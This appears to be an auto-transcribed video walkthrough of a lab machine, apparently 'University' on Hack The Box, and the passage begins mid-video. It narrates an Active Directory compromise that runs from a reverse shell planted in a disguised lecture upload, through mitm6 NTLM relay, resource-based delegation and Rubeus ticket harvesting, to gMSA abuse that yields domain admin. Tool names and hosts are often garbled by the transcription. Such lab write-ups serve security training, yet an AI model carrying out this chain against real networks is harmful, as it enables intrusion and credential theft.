file. That was bizarre. Let's go to a course, add a new lecture, updated lecture, browse. We want to do clickme.zip and the signature. Okay, so now the final thing we want to do is the iCackles command, right? So we can do iCackles /rev.exe grant, and I typoed that again. We do grant everyone full access. Let's make sure this works. Successfully processed. So everyone has full access to this. I'm going to upload this. And if everything goes to plan, a user that is on this box, we don't know who it is, right? But if I do get process, we do see there is a interactive explorer. So someone would download that lecture and then click that URL file. And that URL file is going to be a shortcut to this rev.exe, which is going to send a reverse shell over to our lab machine. At least that is the hope. So what I'm going to do is I'm just going to sleep for 2 minutes. I don't think it's going to take 2 minutes. Hopefully it only takes another like 30, 60 seconds. But hopefully we get a hit. And yeah, so I'm going to pause the video and we'll resume it when the sleep is done. Okay, so we still don't have a shell. I'm not exactly sure why, but my first guess is maybe we created this executable wrong. So I'm going to execute it and make sure we get a shell. We don't. Let's go here. I think this is why I created the executable. Let's do MSF Venom. Yep, there it is. Oh, it is L port, I think. That's probably going to be the issue. That is annoying. Let's go here. Do I have the upload command? It's not in the history. Upload, home, ipsec, HTTP. We can delete rev.exe real quick. Upload, home, ipsec, HTTP, university, rev.exe. This should upload relatively quickly. There we go. And then we want to do that iCackles command again. There we go. Rev.exe. Okay. Now we know our shell works. So that's step 1 in troubleshooting. Let's go ahead and upload this again. Let's see, that was clickme.zip and the signature already exist. CP clickme zip. We'll do lecture clickme.zip. And you can change the file name and it doesn't change the signature. So that should be fine. Upload. Okay, it's uploaded successfully. Let's wait 2 minutes again to see if everything works. If we don't get a shell, then what my next plan of action would be is take this sample lecture and try to mimic our structure to be a little bit more like that. We could also just copy the shortcut and try to execute the shortcut to make sure we don't have any issues there. As a refresher, our shortcut was clickme.url, right? So this was that. So we could put this to a file and then see if we can just execute the file and see if we get a shell back. That looks fine to me. We have file : then C : program data doesn't have any typos, rev.exe. Yeah, that all looks fine. Maybe this extra line break is causing an issue. I don't know. So that's where, oh, we have a shell back. Awesome. If we do who am I, we are now Martin T. So if I can do task list, that command now works. Remember before it did not work. So all this enables us to do is make the machine make a request pretty quickly. So let's go back into SSH. So let me cat creds, grab this password, proxy chains, SSH, WAO at 192.168.99.12. Put this password in, sudo su. Okay. And we're going to need another connection here. I'm just going to start that up real quick. to 168.99.2. 12. Okay. So this piece up here, this is all optional. This is just so we can do the DNS request really quickly, right? When I showed earlier is when we did that TCP dump, we do see the server reaching out over IPv6 link local address. That's the FE80 ones, and it's asking for wpad. And because it's unconstrained delegation, if we respond to this request and say, hey, we're this box, then we can then do an NTLM relay attack, forward it over to LDAP, and then give our box the allowed to act upon attribute, I think. And what that's going to enable us to do is create our own ticket to log into the box. Now, if we just use NTLMRELAYX to do everything for us, we're going to have an issue, and that is because secure LDAP is not configured. If we go nmap, university, nmap, that's going to be like this 636 where we just get TCP wrapped. So we won't be able to talk to LDAP secure, which means we can't use NTLM Relay to create the machine account for us. So before we do that, we'll just have to specify the machine account. And a good blog post is from GuidePoint Security. So if I Google like GuidePoint Security, I think it's like delegate like a boss. Let's see if this is the post. Yep, this is it. This is essentially what we're going to be able to do. And again, this is because we have the trusted for delegation flag. So I'd highly recommend reading this entire post, right? But I think it's on example 3 is where we start going into it. Let's see, MITM 6, scenario 3. This is it, right? So we're pretty much going to be following their post. But right here, where they're doing NTLMRELAYX, they're going into LDAP-S. That isn't configured for this box, so we won't be able to do that, and that's why we're going to have to do this next step of adding the computer, right? And it talks about that somewhere. Let's see. wpad. Yeah. So I think one of these. Relay, computer, not those. Yeah, right here. So if LDAP-S is not properly configured, the attack will fail, right? We can get around that by just creating the machine account beforehand. And the whole reason we need a machine account is we just need to know the password of the machine account so we can create our own tickets. So let's go ahead and create our computer. So let's do add computer.py. This is going to be a part of impacket. We'll do computer name is IPsec. Computer pass is going to be please subscribe. The escalate, oh, that's going to be part of NTLM Relay. Computer pass, the DC host is DC University HTTP. And then we need to do credentials. So we'll do University WAO. And then we got to get the password. This, copy, paste. Okay. Let's see, does this work? It is thinking. Successfully added. So we have a machine account now of IPsec, and we know the password that is set to please subscribe. So the next thing we have to do is get man the middle 6. So I'm going to do MITM 6 GitHub. I forget what package this is from. It's probably linked on GuidePoint Security's post, but we also have it here. And then we're just going to hope that this just works without having to get any extra files. So we can copy this. Let's do v mitm6.py. And then we can paste this all. Okay. And I think NTLM Relay is already on this box. It is. So what we want to do is Python 3, man the middle 6.py, specify the domain, university.htb, and then the interface, which is eth0. There we go. It is starting to work. So now let's do NTLMRelay. And hold on, I'm just going to get this there. Okay. So NTLMRelay, we need to do -6 because we want to do IPv6. Then the target is going to be LDAP 192.168.99.1. Then we want delegate access. Then escalate user. This is going to be the machine account we created, which is IPsec. And then WH, this is going to be the wpad. And it doesn't matter what we put here. And then we want to do TS for timestamp. And then I don't think we want to create a domain admin. I think this is all we do. Let's see. Unrecognized argument, IPsec $. I think it's -- escalate user. There we go. Okay, so we're waiting on connections. No route, that should be fine. So what we want to do here is make sure Windows Update Service is started. So we can do get service WAU serve. Get service WAU serve. I'm not in PowerShell. sc.exe query paste. What? A reverse shell died. That sucks. Let's get it again, and we'll have to rename this. I probably should just put this in Burp Suite, so we don't have to keep renaming this file. Let's do test. This browse. Where's the signature? I'm going to put this in the repeater tab in case it kicks us out again. We'll just be able to edit it. Submit. Send this to repeater. Send. So the next time it fails, we can just go change this 1 to a 2, and then that will just give us a shell back. So hopefully we get it back relatively soon. It may have already worked without us doing anything, because we see it forwarding wpad.dat. We get this request, and hopefully within like next minute or two, we'll see it adding other things. It'll be like giving permission to the IPsec machine. But let's run this sc command again real quick. Okay, it is running. You could do a start if it's in the stop state instead of query, but it is running. So now all we want to do is start process, file path, MS settings, Windows update. We want to go in PowerShell. Wait, I typed that. I don't think that's PowerShell. Let's do this. Start process. Let's do PowerShell maybe. Yeah. So I think it's PowerShell start process, and that will force the machine to start doing lookups, right? But you don't have to do that if you're patient. We did see requesting path. Here we go. Connection target, we forwarded, we authenticate as WS3. Then we enumerate our privileges, and then we do delegation rights. And now it says IPsec can impersonate WS3. So what that enables us to do now is create our own tickets. So let's just do it from here. We can do a getST for service ticket, SPN, HTTP, WS3 university.htb, then university.htb, and then our machine account, which is IPsec, and then the password, which is please subscribe, Then we want to impersonate administrator. And the DC IP is 10.10.11.39. And I have SPM, it's SPN. Clock skew is too great. Let's do sudo ntp date, DC University HTTP. Fixed or time sync. Getting a TGT for this user. So again, this ticket is going to be for IPsec, and then like the machine account IPsec that we created. And then the ticket's also going to have the impersonation flag of administrator. And because we added the delegation rights of IPsec, the machine account's going to trust our machine, right? That's essentially what we did. So now we should be able to log in. And I think I already did the netexec, right? Let's see, ls grep krb. Was that in dub? Let's just do it again real quick. I think I already did this, but just to be safe, nxc smb dc university htb generate krb5 file krb5.conf sudo move krb5 etc krb5. There we go. And now we'll have to add an entry for WS3 because we're going to be using a Kerberos ticket. Kerberos really likes having DNS. So we can do WS3, University HTTP, WS3 as well. That should be fine. And then we want to do krb5 cc name is equal to administrator or cc cache that we created. Proxy chains, evil win rm. The realm is going to be university.htb. The IP address, ws3.university.htb. And now we're administrator on this box, right? We can't get back to the domain controller. So if we did dir, what was it? 192.168.99.1. We get a permission denied. If we tried like DC University HTTP, permission denied because University of, oddly that doesn't exist, but we can't get back to the domain with this ticket because the domain controller doesn't trust it. IPsec is not allowed to impersonate users to the DC. It's only allowed to impersonate users to this box, right? So what we want to do now is upload Rubeus here. So let's do cp opt sharp collection net framework 4.5 x60. No, we want any. Then Rubeus. Then let's go back to program data. Upload home IPsec university Rubeus.exe. Home IPsec HTTP. Every now and then, evo1m crashes with weird things. CD, program data, uploading it. Okay. So what we want to do with Rubeus is just monitor. So if we do Rubeus.exe monitor, we want to specify no wrap. And this is going to just monitor all TGTs that go into this computer. And this is where if the domain was vulnerable to like printer bug, a petite protom, we do that to force the machine account to authenticate, or the machine account of the domain controller to authenticate against this machine. It's not vulnerable to that, but we do have a few tickets in memory, right? Any of these tickets we'll be able to use, like Martin T, we have. WS3, that's the machine account, Rose.L, WS3. So we now gained access to Martin and Rose. So let's go back to Bloodhound and let's search for Martin T. And we'll mark Martin as owned. Let's turn Burp Suite off. I guess we have to log back in. Do Martin T. Mark as owned. And then we want Rose. And then mark Rose. Come on, Bloodhound. This is going slow. I'm not sure if you can hear me clicking. I am. I think my Firefox froze. You can see like my CPU's not moving here. When I'm recording this video, everything is going wrong that could be going wrong. I'm going to pause the video and we'll resume when my computer starts responding again. Okay, it looks like my computer started responding again. So if I click Rose, that looks fine. Let's add Rose to owned. And then let's do cipher queries. And I'm going to show shortest path from owned principals to tier 0. Not high value. Let's just do tier 0. Mismatch? Uh-oh. Did something not work with my Bloodhound? Let's see. Shortest path. There we go. We click that, run. Okay, let's try shortest path to domain admin, owned objects tier 0. Just this. That does not seem to be working. Why is that query like all commented out? I wonder if that one is just broken. Let's go back to, oh my God. It hijacked my control F. I do not like how big this font is. Let's just run this query. It's messy, but I'm sure the data will be here. So where are we? Who are you? So this is GMSA. So that's a high value target. Account operator. Let's see. Help desk. So Rose. So Rose is a member of help desk operators, which, does it say what edge this is? Is a member of account operators, which can read the group managed password to this group managed service account, which is allowed to act on the DC. So if we get this hash, we can then impersonate other users to connect to the DC essentially. And because Rose is a member of account operators that can read this, we just need to use her ticket to access the group managed service account password. So I'm going back to my Rubeus output, and then let's go ahead and grab Rose's TGT. And Rubeus outputs in Kirby format, so we'll have to convert this to CC cache so we can use it. So I'm going to do Rose. We can probably just echo, right? There we go. Base64D to Rose.Kirby. I think it was Rose.L.Kirby because her name's Rose.L. So let's now do ticket converter. And then we'll do Rose.L.CC cache. And looks like it's completed. So now that we have converted it, let's see. Can we just do Kerberos5cc name is equal to Rose.L cc cache nxc LDAP DC University HTB. Is it -K for Kerberos? GMSA. Let's see. We didn't do something correctly. Let's do a -H. Kerberos. We probably need to use Kcache. That's it. Like this. And there we go. We have the NTLM hash of the GMSA P client. So we'll use the getST again for a get service ticket. And then we can do SPN, HTTP, DC, University, HTTP, specify hashes. And we're going to use the NTLM hash. So like that. And then the account name. So University HTTP /GMSA P client 01, like that. And we want to impersonate the administrator. There we go. So now we have this ticket. So I'm going to copy this. We can say Kerb5cc name is equal to that. And then all we have to do is evil win RM, DC University HTTP, and the realm University HTTP. And we have used the group managed service account to impersonate the administrator because they are allowed to act, which gives us that permission. And now we're admin on the domain. So we can do cd.desktop dir and get root.txt. So that's going to be the box. Hopefully this made sense. A lot of things went wrong as I was solving it. It's a very tough box to do, but hope you guys enjoyed it. Take care, and I will see you all next time.